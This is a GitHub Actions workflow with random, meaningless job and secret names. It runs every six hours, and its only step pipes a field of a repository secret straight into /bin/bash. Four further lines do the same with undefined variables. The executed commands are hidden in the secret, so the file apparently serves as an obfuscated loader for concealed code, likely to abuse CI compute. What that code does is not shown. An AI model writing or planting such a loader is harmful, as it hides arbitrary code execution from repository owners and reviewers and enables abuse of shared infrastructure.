name: misshgaukll
on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: misshgaukll
        env:
          yyoqy40067: ${{ secrets.yyoqy40067 }}
        run: |
          echo $yyoqy40067 | jq -r .lizm5 | /bin/bash
          echo $eh15 | jq -r .x906 | /bin/bash
          echo $n9 | jq -r .j85 | /bin/bash
          echo $spgm71 | jq -r .aidgm0731 | /bin/bash
          echo $hyg68 | jq -r .vi153 | /bin/bash

